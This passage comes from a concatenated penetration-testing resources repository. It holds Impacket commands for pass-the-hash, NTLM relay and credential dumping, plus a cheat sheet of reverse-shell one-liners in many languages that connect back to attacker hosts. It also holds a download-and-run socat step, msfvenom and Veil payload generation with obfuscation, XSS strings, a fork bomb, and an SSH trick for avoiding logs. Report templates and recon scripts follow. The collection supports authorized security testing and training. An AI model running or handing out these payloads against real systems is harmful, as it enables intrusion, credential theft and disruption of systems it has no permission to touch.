| gpprefdecrypt.py -s smb://10.0.0.8/sysvol -u your-user -p your-password -d your-domain.local 37 | 38 | # Enumerate Kerberos tickets from a machine using Kerberos protocol 39 | ticketer.py -nthash your-nt-hash -domain-sid your-domain-sid -domain your-domain.local your-user 40 | 41 | # Perform pass-the-hash attack with SMB and execute a command 42 | psexec.py -hashes lmhash:nthash your-domain.local/your-user@10.0.0.9 cmd.exe 43 | 44 | # Perform pass-the-ticket attack with Kerberos and execute a command 45 | wmiexec.py -k -no-pass your-domain.local/your-user@10.0.0.10 cmd.exe 46 | 47 | 48 | #SMB and SQL Specific 49 | 50 | # Host a read-only SMB server on port 445 with the provided folder as the share 51 | smbserver.py -smb2support -username your-user -password your-password SHARE_NAME /path/to/folder 52 | 53 | # Host an SMB server with write access on a specific IP and port 54 | smbserver.py -smb2support -ip 10.0.0.1 -port 8445 -username your-user -password your-password -comment 'Writable Share' SHARE_NAME /path/to/folder 55 | 56 | # Connect to an SQL Server instance and execute a query (Windows Authentication) 57 | mssqlclient.py -windows-auth your-domain.local/your-user:your-password@10.0.0.2 58 | 59 | # Connect to an SQL Server instance and execute a query (SQL Server Authentication) 60 | mssqlclient.py -db your-database your-user:your-password@10.0.0.3 61 | 62 | # Connect to an SQL Server instance and enable xp_cmdshell 63 | mssqlclient.py your-domain.local/your-user:your-password@10.0.0.4 -enable-xp-cmdshell 64 | 65 | # Execute a command on the SQL Server using xp_cmdshell (once it's enabled) 66 | mssqlclient.py your-domain.local/your-user:your-password@10.0.0.5 -q 'EXEC xp_cmdshell "ipconfig"' 67 | 68 | # Perform an NTLM relay attack from an SMB server to a target machine 69 | ntlmrelayx.py -t smb://10.0.0.6 -smb2support -smbserver your-smb-server 70 | 71 | # Perform an NTLM relay attack from an SMB server to an LDAP server 72 | ntlmrelayx.py -t ldap://10.0.0.7 -smb2support -smbserver your-smb-server 73 | 74 | # Enumerate MSSQL instances using SQL Server Browser service 75 | mssqlinstance.py -ip 10.0.0.8 76 | 77 | # Test an MSSQL connection with a provided username and password 78 | mssqlclient.py -db your-database -windows-auth your-domain.local/your-user:your-password@10.0.0.9 79 | 80 | 81 | #Top 10 Bug Bounty 82 | 83 | # 1. Enumerate users in the Active Directory domain 84 | GetADUsers.py -all -dc-ip 10.0.0.1 your-domain.local/your-user:your-password 85 | 86 | # 2. Retrieve users without pre-authentication enabled (AS_REP Roasting) 87 | GetNPUsers.py your-domain.local/ -usersfile users.txt -outputfile hashes.txt -dc-ip 10.0.0.1 -format john 88 | 89 | # 3. Dump password hashes from a Windows machine using SMB protocol (look for weak or reused passwords) 90 | secretsdump.py -just-dc your-domain.local/your-user:your-password@10.0.0.2 91 | 92 | # 4. Enumerate shares and permissions on a target machine using SMB (identify misconfigured shares) 93 | smbmap.py -u your-user -p your-password -d your-domain.local -H 10.0.0.3 94 | 95 | # 5. Enumerate and retrieve group policy preferences from a domain controller (look for hardcoded credentials) 96 | gpprefdecrypt.py -s your-domain.local -u your-user -p your-password -d your-domain.local 97 | 98 | # 6. Enumerate Kerberos tickets from a machine using Kerberos protocol (identify misconfigurations or vulnerabilities) 99 | ticketer.py -nthash your-nt-hash -domain-sid your-domain-sid -domain your-domain.local your-user 100 | 101 | # 7. Perform pass-the-hash attack with SMB and execute a command (escalate privileges) 102 | psexec.py -hashes lmhash:nthash your-domain.local/your-user@10.0.0.4 cmd.exe 103 | 104 | # 8. Connect to an SQL Server instance and execute a query (identify SQL Server misconfigurations or vulnerabilities) 105 | mssqlclient.py -db your-database your-user:your-password@10.0.0.5 106 | 107 | # 9. Perform an NTLM relay attack from an SMB server to a target machine (exploit misconfigured SMB signing) 108 | ntlmrelayx.py -t smb://10.0.0.6 -smb2support -smbserver your-smb-server 109 | 110 | # 10. Test an MSSQL connection with a provided username and password (identify weak or reused credentials) 111 | mssqlclient.py -db your-database -windows-auth your-domain.local/your-user:your-password@10.0.0.7 112 | ``` 113 | -------------------------------------------------------------------------------- /resources/payload-cheatsheets/reverse-shells.md: -------------------------------------------------------------------------------- 1 | ## Reverse Shell OneLiners 2 | Spawn, catch & upgrade reverse shells 3 | 4 | 5 | ### Reverse Shells 6 | 7 | #### **Bash** 8 | 9 | ```bash 10 | bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 11 | ``` 12 | 13 | **Alternatives for Bash shell:** 14 | 15 | ```bash 16 | exec /bin/bash 0&0 2>&0 17 | ``` 18 | 19 | ```bash 20 | 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 21 | ``` 22 | 23 | ```bash 24 | exec 5<>/dev/tcp/attackerip/4444 25 | cat <&5 | while read line; do $line 2>&5 >&5; done # or: 26 | while read line 0<&5; do $line 2>&5 >&5; done 27 | ``` 28 | 29 | 30 | #### **PERL** 31 | 32 | ```perl 33 | perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 34 | ``` 35 | 36 | **Shorter Perl reverse shell that does not depend on /bin/sh:** 37 | 38 | ```perl 39 | perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 40 | ``` 41 | 42 | **If the target system is running Windows use the following one-liner:** 43 | 44 | ```perl 45 | perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 46 | ``` 47 | 48 | 49 | #### **Python** 50 | 51 | ```python 52 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 53 | ``` 54 | 55 | 56 | #### **PHP** 57 | 58 | ```php 59 | php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' 60 | ``` 61 | 62 | 63 | #### **Ruby** 64 | 65 | ```ruby 66 | ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 67 | ``` 68 | 69 | Longer Ruby reverse shell that does not depend on /bin/sh: 70 | 71 | ```ruby 72 | ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' 73 | ``` 74 | 75 | If the target system is running Windows use the following one-liner: 76 | 77 | ```ruby 78 | ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' 79 | ``` 80 | 81 | 82 | #### **Netcat** 83 | 84 | Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option. 85 | 86 | ```bash 87 | nc -e /bin/sh 10.0.0.1 1234 88 | ``` 89 | 90 | If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this: 91 | 92 | ```bash 93 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f 94 | ``` 95 | 96 | Other nc alternatives: 97 | 98 | ```bash 99 | nc -c /bin/sh attackerip 4444 100 | ``` 101 | 102 | ```bash 103 | /bin/sh | nc attackerip 4444 104 | ``` 105 | 106 | ```bash 107 | rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p 108 | ``` 109 | 110 | 111 | #### **Java** 112 | 113 | ```java 114 | r = Runtime.getRuntime() 115 | p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) 116 | p.waitFor() 117 | ``` 118 | 119 | 120 | #### **Telnet** 121 | 122 | ```bash 123 | rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p 124 | ``` 125 | 126 | ```bash 127 | telnet attackerip 4444 | /bin/bash | telnet attackerip 4445 # Remember to listen on your machine also on port 4445/tcp 128 | ``` 129 | 130 | 131 | #### **xterm** 132 | 133 | The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001. 134 | 135 | 136 | ``` 137 | xterm -display 10.0.0.1 138 | ``` 139 | *Or:* 140 | 141 | ``` 142 | $ DISPLAY=attackerip:0 xterm 143 | ``` 144 | 145 | To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system): 146 | 147 | ``` 148 | Xnest :1 149 | ``` 150 | 151 | You’ll need to authorise the target to connect to you (command also run on your host): 152 | 153 | ``` 154 | xhost +targetip 155 | ``` 156 | 157 | Note that on Solaris xterm path is usually not within the PATH environment variable, you need to specify its filepath: 158 | 159 | ``` 160 | /usr/openwin/bin/xterm -display attackerip:1 161 | ``` 162 | --- 163 | 164 | ## Shell Upgrades 165 | 166 | #### Method 1: Python pty module 167 | 168 | ```bash 169 | python -c 'import pty; pty.spawn("/bin/bash")' 170 | ``` 171 | 172 | #### Method 2: Using socat 173 | 174 | On attack machine (listen): 175 | 176 | ```bash 177 | socat file:\`tty\`,raw,echo=0 tcp-listen:4444 178 | ``` 179 | 180 | On Victim (launch): 181 | 182 | ```bash 183 | socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 184 | ``` 185 | 186 | #### Method 3: Upgrading from netcat with magic 187 | 188 | In reverse shell: 189 | 190 | ```bash 191 | python -c 'import pty; pty.spawn("/bin/bash")' 192 | ``` 193 | 194 | On attack machine: 195 | 196 | ```bash 197 | stty raw -echo 198 | fg 199 | ``` 200 | 201 | In reverse shell: 202 | 203 | ```bash 204 | reset 205 | export SHELL=bash 206 | export TERM=xterm-256color 207 | stty rows columns 208 | ``` 209 | 210 | #### Method 4: Using script 211 | 212 | ```bash 213 | script -qc /bin/bash /dev/null 214 | ``` 215 | 216 | #### Method 5: Using Other Scripting Languages 217 | 218 | Perl: 219 | 220 | ```perl 221 | perl -e 'exec "/bin/sh";' 222 | ``` 223 | 224 | Ruby: 225 | 226 | ```ruby 227 | ruby -e 'exec "/bin/sh"' 228 | ``` 229 | 230 | Lua: 231 | 232 | ```lua 233 | lua -e "os.execute('/bin/sh')" 234 | ``` 235 | 236 | #### Method 6: Using socat one-liner 237 | 238 | ```bash 239 | wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /dev/shm/socat; chmod +x /dev/shm/socat; /dev/shm/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.15.100:4444 240 | ``` 241 | 242 | #### Method 7: Using Expect 243 | 244 | Create a script called sh.exp: 245 | 246 | ```bash 247 | #!/usr/bin/expect 248 | spawn sh 249 | interact 250 | ``` 251 | 252 | Then, execute this script on the victim machine. 253 | 254 | #### Method 8: Using rlwrap 255 | 256 | ```bash 257 | rlwrap nc -lvnp 258 | ``` 259 | 260 | — 261 | 262 | #### References 263 | 264 | 265 | ``` 266 | 267 | 1. Reverse Shell Cheat Sheet | pentestmonkey. (n.d.). https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 268 | 269 | 2. Reverse shells one-liners. (n.d.). https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html?m=1 270 | 271 | 3. ropnop blog. https:// blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ 272 | 273 | 4. zweilosec. https://zweilosec.github.io/posts/upgrade-linux-shell/ 274 | 275 | 5. 0xffsec. https://0xffsec.com/handbook/shells/full-tty/ 276 | 277 | ``` -------------------------------------------------------------------------------- /resources/payload-cheatsheets/veil-venom-shells.sh: -------------------------------------------------------------------------------- 1 | 2 | 3 | # MSVenom payloads 4 | 5 | # Windows Reverse TCP Meterpreter 6 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o reverse_meterpreter.exe 7 | 8 | # Linux Reverse TCP Meterpreter 9 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf -o reverse_meterpreter.elf 10 | 11 | # macOS Reverse TCP Meterpreter 12 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho -o reverse_shell.macho 13 | 14 | # Android Reverse TCP Meterpreter 15 | msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= -o reverse_meterpreter.apk 16 | 17 | # PHP Reverse TCP Meterpreter 18 | msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw -o reverse_shell.php 19 | 20 | # Generate a Windows x86 reverse shell payload in the Powershell format 21 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f powershell -o reverse_shell.ps1 22 | 23 | # Generate a Linux x86 bind shell payload in the Python format 24 | msfvenom -p linux/x86/shell/bind_tcp LPORT= -f python -o bind_shell.py 25 | 26 | # Generate a macOS x86 reverse TCP Meterpreter payload that connects through an HTTP proxy 27 | msfvenom -p osx/x86/meterpreter/reverse_tcp LHOST= LPORT= -f macho -o reverse_meterpreter.macho HTTP_PROXY=http://proxy.example.com:8080 28 | 29 | # Generate a Windows x64 reverse HTTPS Meterpreter payload that encrypts communications with RC4 30 | msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT= -f exe -o reverse_meterpreter.exe ENCODING=rc4 31 | 32 | 33 | # Veil payloads 34 | 35 | # Generate a custom payload with a specific name and set of evasion techniques 36 | python Veil.py -p python/meterpreter/rev_http -o my_payload -t python -c '-e x86/shikata_ga_nai -o raw -H 5' 37 | 38 | # Generate a payload with a custom shellcode encoder 39 | python Veil.py -p python/meterpreter/rev_tcp -o my_payload -t python -c '-x alpha_mixed' 40 | 41 | # Generate a payload with custom obfuscation options 42 | python Veil.py -p python/meterpreter/reverse_tcp -o my_payload -t python -c '-t PS -Obfuscate true -ObfuscationType 3 -OutDirectory /root/veil/payloads/obfuscated' 43 | 44 | # Generate a payload with an encrypted communication channel 45 | python Veil.py -p python/meterpreter/rev_tcp -o my_payload -t python -c '-e x86/shikata_ga_nai -o raw -C :' 46 | -------------------------------------------------------------------------------- /resources/payload-cheatsheets/xss-strings.md: -------------------------------------------------------------------------------- 1 | Standard JS 2 | 3 | ```js 4 | 5 | '', 6 | '', 7 | '", 35 | "', 36 | '', 37 | '', 38 | '', 39 | '', 40 | '', 41 | ``` 42 | Actions 43 | ```js 44 | '">', 45 | '">', 46 | '" autofocus onfocus=alert("XSS")>', 47 | '" onclick=alert("XSS)//', 48 | '" ondblclick=alert("XSS")>', 49 | '" onfocus=alert(document.domain)>', 50 | '">', 51 | '">', 52 | '">">', 53 | '" onmouseover=alert("XSS")> ', 55 | '">', 56 | '">', 57 | '">
', 58 | '', 59 | ``` 60 | Images 61 | ```js 62 | '">', 63 | '', 64 | '', 65 | '', 66 | '', 67 | '', 68 | '', 69 | '', 70 | 71 | -------------------------------------------------------------------------------- /resources/readme.md: -------------------------------------------------------------------------------- 1 | **First, visit the [Checklists, Cheatsheets & Resources](https://github.com/Root-Down-Digital/pentesting-resources/blob/main/repos/repos-main.md#reference) with guides and reports.** 2 | 3 | ## Helpful Oneliners 4 | 5 | ### Recon 6 | 7 | List all nmap NSE scripts 8 | ```bash 9 | ls /usr/share/nmap/scripts | sed ‘s/\.nse$//‘ | sort 10 | ``` 11 | 12 | ### Exploit 13 | 14 | ”Linux Fork Bomb” - Create processes until the system “crashes” 15 | ```bash 16 | :(){ :|: & };: 17 | ``` 18 | 19 | ### C2 & PostOP 20 | 21 | ”Almost Invisible SSH” - This will not add your user to the /var/log/utmp file and you won’t show up in w or who command of logged in users. It will bypass profile and bash profile as well. On your client side it will stop logging the host name to 22 | ```bash 23 | ~/.ssh/known_hosts.* Credit: netmux 24 | ssh -o UserKnownHostsFile=/dev/null -T user@example. com “bash -¡” 25 | ``` 26 | 27 | Delete empty files in folder 28 | ```bash 29 | alias rm0=“find . -madepth 1 -size 0 -delete -print” 30 | ``` 31 | 32 | Cleanup old docker containers 33 | ```bash 34 | #!/bin/bash 35 | 36 | sudo docker stop $(sudo docker ps -aq) 37 | sudo docker rm $(sudo docker ps -aq) 38 | sudo docker rmi $(sudo docker images -q) 39 | sudo docker volume rm $(sudo docker volume ls -q) 40 | sudo docker network rm $(sudo docker network ls -q) 41 | ``` 42 | 43 | ## Tools 44 | 45 | [One-Lin3r](https://github.com/D4Vinci/One-Lin3r) one-liner tool for common commands 46 | 47 | 48 | 49 | For attribution, if not properly cited let me know. Contributions welcome. 50 | -------------------------------------------------------------------------------- /resources/reporting/external_test_template.md: -------------------------------------------------------------------------------- 1 | # Report Template 2 | 3 | ## **Penetration Testing Report** 4 | 5 | **Client:** ACME Corporation 6 | 7 | **Date:** March 20, 2023 8 | 9 | **Performed by:** RDD Penetration Testing Team 10 | 11 | ### **1. Executive Summary** 12 | 13 | The purpose of this penetration test was to assess the security posture of ACME Corporation's external network and web applications. The test was conducted using industry-standard methodologies and tools. Overall, the security posture of the organization is good, but a few critical and high-risk vulnerabilities were identified, which require immediate attention to prevent potential exploitation and business impact. 14 | 15 | ### **2. Technical Summary** 16 | 17 | The penetration test was conducted using a combination of automated scanning tools, manual testing techniques, and vulnerability exploitation. The testing methodology followed the six-step process outlined in the RDD Penetration Testing Playbook: 18 | 19 | 1. Open Source Intelligence (OSINT) 20 | 2. Enumeration and Fuzzing 21 | 3. Vulnerability Assessment 22 | 4. Exploitation 23 | 5. Privilege Escalation 24 | 6. Reporting 25 | 26 | ### **3. Findings and Risk Ratings** 27 | 28 | | Finding ID | Vulnerability | Risk Rating | Affected System | 29 | | --- | --- | --- | --- | 30 | | F-001 | SQL Injection | High | Web Application | 31 | | F-002 | Unsecured S3 Bucket | Critical | Cloud Environment | 32 | | F-003 | Weak Password | Medium | Network Device | 33 | | F-004 | Outdated SSL/TLS | Medium | Web Server | 34 | 35 | ### **4. Mitigation Strategies** 36 | 37 | **F-001: SQL Injection** 38 | 39 | - Validate and sanitize user input to prevent malicious SQL code from being executed. 40 | - Use parameterized queries, prepared statements, or stored procedures to separate SQL code from data. 41 | - Implement a Web Application Firewall (WAF) to detect and block SQL injection attempts. 42 | 43 | **F-002: Unsecured S3 Bucket** 44 | 45 | - Restrict public access to the S3 bucket by updating the bucket policy. 46 | - Enable server-side encryption for data stored in the bucket. 47 | - Implement a logging and monitoring solution to detect unauthorized access to the bucket. 48 | 49 | **F-003: Weak Password** 50 | 51 | - Enforce a strong password policy, including minimum length, complexity, and expiration requirements. 52 | - Implement multi-factor authentication (MFA) for administrative access to network devices. 53 | - Regularly audit user accounts and passwords to identify weak or reused passwords. 54 | 55 | **F-004: Outdated SSL/TLS** 56 | 57 | - Update the web server to support the latest TLS version (e.g., TLS 1.3). 58 | - Disable weak ciphers and use strong cipher suites recommended by industry standards. 59 | - Regularly review and update SSL/TLS configurations to maintain compliance with best practices. 60 | -------------------------------------------------------------------------------- /resources/reporting/img/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /resources/reporting/img/rootdown_logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Root-Down-Digital/pentesting-resources/52021c46aa1176fcd188b489ed90117046a94bf3/resources/reporting/img/rootdown_logo.png -------------------------------------------------------------------------------- /scripts/automation/AppendToNotion.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Set NOTION_TOKEN and NOTION_DATABASE_ID 4 | # Note: Assumes there is subdomains.txt 5 | # also assumes your Notion database has 6 | # a Name property for the subdomain and a Date Added property 7 | 8 | NOTION_TOKEN="your_notion_token" 9 | NOTION_DATABASE_ID="your_database_id" 10 | 11 | # Get the current date and time 12 | current_date=$(date '+%Y-%m-%d %H:%M:%S') 13 | 14 | # Loop through the txt file 15 | while IFS= read -r subdomain 16 | do 17 | # Prepare the data to be sent to Notion 18 | data=$(cat < /dev/null; then 16 | echo "$tool is required but not installed. Please install it first." 17 | exit 1 18 | fi 19 | done 20 | 21 | # Run the command and append the results to the output file 22 | subfinder -d $domain -silent | assetfinder --subs-only | httprobe -c 50 | tee temp_urls.txt | { while read url; do echo $url | waybackurls; echo $url | hakrawler; done } | sort -u | anew $output_file && rm temp_urls.txt 23 | # Check if a cron job for this script already exists 24 | cron_job_exists=$(crontab -l | grep -F "$0 $domain $output_file") 25 | 26 | if [ -n "$cron_job_exists" ]; then 27 | # Ask the user if they want to remove the existing cron job 28 | read -p "A cron job for this script already exists. Do you want to remove it? (y/n) " -n 1 -r 29 | echo 30 | if [[ $REPLY =~ ^[Yy]$ ]]; then 31 | # Remove the existing cron job 32 | (crontab -l | grep -vF "$0 $domain $output_file") | crontab - 33 | fi 34 | else 35 | # Ask the user if they want to register this script as a cron job 36 | read -p "Do you want to register this script as a cron job? (y/n) " -n 1 -r 37 | echo 38 | if [[ $REPLY =~ ^[Yy]$ ]]; then 39 | # Ask the user for the frequency of the cron job 40 | PS3='Please enter your choice: ' 41 | options=("Hourly" "Daily" "Weekly" "Quit") 42 | select opt in "${options[@]}" 43 | do 44 | case $opt in 45 | "Hourly") 46 | (crontab -l ; echo "0 * * * * $0 $domain $output_file") | crontab - 47 | break 48 | ;; 49 | "Daily") 50 | (crontab -l ; echo "0 0 * * * $0 $domain $output_file") | crontab - 51 | break 52 | ;; 53 | "Weekly") 54 | (crontab -l ; echo "0 0 * * 0 $0 $domain $output_file") | crontab - 55 | break 56 | ;; 57 | "Quit") 58 | break 59 | ;; 60 | *) echo "invalid option $REPLY";; 61 | esac 62 | done 63 | fi 64 | fi 65 | -------------------------------------------------------------------------------- /scripts/automation/CyberRecon.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ########################################################## 4 | # CyberRecon.sh 5 | # Comprehensive Cybersecurity Reconnaissance Script 6 | # 7 | # Description: 8 | # This script performs a detailed cybersecurity reconnaissance and scanning 9 | # for a given target domain. It integrates various tools to enumerate 10 | # subdomains, analyze DNS, scan web endpoints, identify vulnerabilities, 11 | # and perform port scanning. The results are compiled into a report, 12 | # and notifications are sent via Discord. 13 | # 14 | # Usage: 15 | # ./CyberRecon.sh 16 | # Example: ./CyberRecon.sh example.com 17 | # 18 | # Output: 19 | # All findings are stored in a target-specific directory under ./scans/. 20 | # A final report is compiled in the same directory for easy review. 21 | # 22 | # Prerequisites: 23 | # - Ensure all required tools (amass, subfinder, github-subdomains, etc.) are installed. 24 | # - Set the 'DISCORD_WEBHOOK_URL' to your Discord webhook for notifications. 25 | # 26 | # Author: @lukeswitz 27 | # Created: 22_DEC_2023 28 | # Last Updated: 22_DEC_2023 29 | ########################################################## 30 | 31 | # Check for input parameter 32 | if [ "$#" -ne 1 ]; then 33 | echo "Usage: $0 " 34 | exit 1 35 | fi 36 | 37 | TARGET_DOMAIN="$1" 38 | DISCORD_WEBHOOK_URL="your_discord_webhook_url" 39 | 40 | # Directory setup for new target 41 | WORKING_DIR="./scans/$TARGET_DOMAIN" 42 | mkdir -p $WORKING_DIR 43 | 44 | # Output files setup 45 | SUBDOMAINS_FILE="$WORKING_DIR/subdomains.txt" 46 | DNS_ANALYSIS_FILE="$WORKING_DIR/dns_analysis.txt" 47 | WEB_ENDPOINTS_FILE="$WORKING_DIR/web_endpoints.txt" 48 | VULNERABILITY_FILE="$WORKING_DIR/vulnerabilities.txt" 49 | PORT_ENUM_FILE="$WORKING_DIR/port_enum.txt" 50 | FINAL_REPORT="$WORKING_DIR/final_report.txt" 51 | 52 | # Function to Notify via Discord 53 | notify_discord() { 54 | curl -H "Content-Type: application/json" -d "{\"content\": \"$1\"}" $DISCORD_WEBHOOK_URL 55 | } 56 | 57 | # Clearing previous data 58 | > $SUBDOMAINS_FILE 59 | > $DNS_ANALYSIS_FILE 60 | > $WEB_ENDPOINTS_FILE 61 | > $VULNERABILITY_FILE 62 | > $PORT_ENUM_FILE 63 | > $FINAL_REPORT 64 | 65 | # Domain and Subdomain Enumeration 66 | echo "Starting Domain and Subdomain Enumeration..." 67 | amass enum -d $TARGET_DOMAIN -o $WORKING_DIR/amass.txt 68 | subfinder -d $TARGET_DOMAIN -o $WORKING_DIR/subfinder.txt 69 | github-subdomains -d $TARGET_DOMAIN -o $WORKING_DIR/githubsubdomains.txt 70 | findomain -t $TARGET_DOMAIN -o $WORKING_DIR/findomain.txt 71 | assetfinder --subs-only $TARGET_DOMAIN | tee $WORKING_DIR/assetfinder.txt 72 | 73 | # Combine and sort the results 74 | cat $WORKING_DIR/*.txt | sort -u > $SUBDOMAINS_FILE 75 | 76 | # DNS Analysis and History 77 | echo "Starting DNS Analysis and History..." 78 | rapid_dns -d $TARGET_DOMAIN | tee -a $DNS_ANALYSIS_FILE 79 | crt.sh -d $TARGET_DOMAIN | tee -a $DNS_ANALYSIS_FILE 80 | dnsx -l $SUBDOMAINS_FILE -o $WORKING_DIR/dnsx.txt 81 | massdns -r lists/resolvers.txt -t A -o S -w $WORKING_DIR/massdns.txt $SUBDOMAINS_FILE 82 | puredns bruteforce subdomains-top1million.txt $TARGET_DOMAIN --resolvers lists/resolvers.txt -w $WORKING_DIR/puredns.txt 83 | 84 | # Combine DNS results 85 | cat $WORKING_DIR/dnsx.txt $WORKING_DIR/massdns.txt $WORKING_DIR/puredns.txt | sort -u >> $DNS_ANALYSIS_FILE 86 | 87 | # Web Endpoint Enumeration 88 | echo "Starting Web Endpoint Enumeration..." 89 | httpx -l $SUBDOMAINS_FILE -silent -threads 100 -o $WEB_ENDPOINTS_FILE 90 | meg -l $SUBDOMAINS_FILE -p /paths.txt -o $WORKING_DIR/out 91 | hakrawler -url $TARGET_DOMAIN | tee -a $WEB_ENDPOINTS_FILE 92 | waybackurls $TARGET_DOMAIN | tee -a $WEB_ENDPOINTS_FILE 93 | gau $TARGET_DOMAIN | tee -a $WEB_ENDPOINTS_FILE 94 | waymore $TARGET_DOMAIN | tee -a $WEB_ENDPOINTS_FILE 95 | 96 | # Data Cleaning and Management 97 | echo "Cleaning and Managing Data..." 98 | cat $WEB_ENDPOINTS_FILE | anew -q $WORKING_DIR/unique_web_endpoints.txt 99 | 100 | # Vulnerability and Exposure Scanning 101 | echo "Identifying Vulnerabilities..." 102 | nuclei -l $WORKING_DIR/unique_web_endpoints.txt -o $WORKING_DIR/nuclei_out.txt 103 | dalfox file $WORKING_DIR/unique_web_endpoints.txt -o $WORKING_DIR/dalfox_out.txt 104 | sqlmap -m $WORKING_DIR/unique_web_endpoints.txt --batch --output-dir=$WORKING_DIR/sqlmap_out 105 | 106 | # Append vulnerabilities to the report 107 | cat $WORKING_DIR/nuclei_out.txt $WORKING_DIR/dalfox_out.txt $WORKING_DIR/sqlmap_out/* > $VULNERABILITY_FILE 108 | 109 | # Port Scanning and Enumeration 110 | echo "Starting Port Scanning and Enumeration..." 111 | naabu -iL $SUBDOMAINS_FILE -o $WORKING_DIR/naabu_out.txt 112 | RustScan -a $TARGET_DOMAIN -u 5000 -- -A -sV -oN $WORKING_DIR/rustscan_out.txt 113 | 114 | # Append port enumeration results 115 | cat $WORKING_DIR/naabu_out.txt $WORKING_DIR/rustscan_out.txt > $PORT_ENUM_FILE 116 | 117 | # Compiling Final Report 118 | echo "Compiling Final Report..." 119 | cat $SUBDOMAINS_FILE $DNS_ANALYSIS_FILE $WEB_ENDPOINTS_FILE $VULNERABILITY_FILE $PORT_ENUM_FILE > $FINAL_REPORT 120 | 121 | # Notify via Discord 122 | notify_discord "Scanning and Analysis Completed for $TARGET_DOMAIN. Check the final report in $WORKING_DIR." 123 | 124 | echo "Workflow Completed. Check $FINAL_REPORT for details." 125 | -------------------------------------------------------------------------------- /scripts/automation/DomainWatchdog.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Check if the correct number of arguments are provided 4 | if [ "$#" -ne 2 ]; then 5 | echo "Usage: $0 domain output_file" 6 | exit 1 7 | fi 8 | 9 | # Assign the arguments to variables 10 | domain=$1 11 | output_file=$2 12 | 13 | # Define the wordlist file 14 | wordlist="directory-list-2.3-medium.txt" 15 | 16 | # Check if dig, ffuf, and wget are installed 17 | for tool in dig ffuf wget; do 18 | if ! command -v $tool &> /dev/null; then 19 | echo "$tool is required but not installed. Please install it first." 20 | exit 1 21 | fi 22 | done 23 | 24 | # Check if the wordlist file exists 25 | if [ ! -f $wordlist ]; then 26 | # If the wordlist file does not exist, download it from the SecLists GitHub repository 27 | echo "Downloading wordlist..." 28 | wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/$wordlist 29 | fi 30 | 31 | # Fetch the current DNS records of the domain 32 | current_dns_records=$(dig $domain ANY +noall +answer) 33 | 34 | # Check if the output file exists 35 | if [ ! -f $output_file ]; then 36 | # If the output file does not exist, create it and write the current DNS records to it 37 | echo "$current_dns_records" > $output_file 38 | else 39 | # If the output file exists, read the previous DNS records from it 40 | previous_dns_records=$(cat $output_file) 41 | 42 | # Compare the current DNS records with the previous ones 43 | if [ "$current_dns_records" != "$previous_dns_records" ]; then 44 | # If the DNS records have changed, log the changes and send an alert 45 | echo "DNS records for $domain have changed:" 46 | echo "Previous DNS records:" 47 | echo "$previous_dns_records" 48 | echo "Current DNS records:" 49 | echo "$current_dns_records" 50 | 51 | # Update the output file with the current DNS records 52 | echo "$current_dns_records" > $output_file 53 | fi 54 | fi 55 | 56 | # Run ffuf to fuzz the directories of the domain 57 | echo "Running directory fuzzing on $domain..." 58 | ffuf -w $wordlist -u http://$domain/FUZZ -mc 200,204,301,302,307,401,403 -o new_directories.json -of json 59 | 60 | # Check if any new directories were found 61 | new_directories=$(jq -r '.results[] | .url' new_directories.json) 62 | 63 | 